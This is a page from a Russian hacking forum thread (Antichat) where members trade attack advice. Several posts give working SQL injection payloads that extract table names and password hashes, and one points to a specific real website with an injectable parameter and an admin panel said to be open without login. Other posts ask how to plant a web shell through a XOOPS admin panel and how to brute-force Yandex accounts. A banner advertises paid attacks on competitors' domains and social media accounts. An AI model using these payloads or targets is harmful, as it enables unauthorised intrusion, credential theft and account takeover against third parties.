Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1316 из 2438

1316

Опции темы

Поиск в этой теме

Опции просмотра

#13151

14.05.2010, 02:11

BrainDeaD

Постоянный

Регистрация: 09.06.2005

Сообщений: 531

С нами: 11010660

Репутация: 439

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

#13152

14.05.2010, 02:13

br1tva

Познающий

Регистрация: 26.12.2007

Сообщений: 38

С нами: 9671107

Репутация: 8

Цитата:

Сообщение от BrainDeaD

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

((

#13153

14.05.2010, 04:13

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

С нами: 8603287

Репутация: 87

Цитата:

Сообщение от br1tva

Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

=convert(int,(SELECT TOP 1 cast(name as nvarchar(4000))%2bchar(126) FROM (database)..sysobjects WHERE xtype=char(85)))--

#13154

14.05.2010, 13:51

ReckouNT

Новичок

Регистрация: 16.01.2009

Сообщений: 17

С нами: 9114129

Репутация: 2

Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
Возможно ли побрутить яндекс этими фамилиями?

#13155

14.05.2010, 15:59

SENIA

Постоянный

Регистрация: 22.11.2008

Сообщений: 344

С нами: 9192645

Репутация: 570

Есть админка XOOPS cms. как залить шелл?
На форуме ничего путевого не нашел.

#13156

14.05.2010, 16:46

DrakonHaSh

Познающий

Регистрация: 16.04.2008

Сообщений: 88

С нами: 9509918

Репутация: 30

парочка общих вопросов накопилась

1. по mysql:
1a.

Код:

+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.

Код:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

Код:

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

Последний раз редактировалось DrakonHaSh; 14.05.2010 в 16:50..

#13157

14.05.2010, 17:20

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

Последний раз редактировалось jecka3000; 14.05.2010 в 17:26..

#13158

14.05.2010, 17:36

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

С нами: 10889431

Репутация: 34

Цитата:

Сообщение от jecka3000

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

1) Никак
2) Найти ошибку с раскрытием пути.

http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1--

Вот скуля раскручивай может чего нарулишь там.

Угар)) там даже раскручивать не надо ))
http://prod1.cmj.com/admin/
Вход в админку без авторизации))

Последний раз редактировалось kfor; 14.05.2010 в 17:42..

#13159

14.05.2010, 18:25

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

С нами: 8603287

Репутация: 87

DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html

#13160

14.05.2010, 20:30

DrakonHaSh

Познающий

Регистрация: 16.04.2008

Сообщений: 88

С нами: 9509918

Репутация: 30

Цитата:

Сообщение от [Feldmarschall]

DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html

пользоваться и применять я это умею

вникни, пожалуйста, в то, что я спрашиваю:

1. по mysql:
1a.

Код:

+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.

Код:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

Код:

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

Страница 1316 из 2438

1316

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход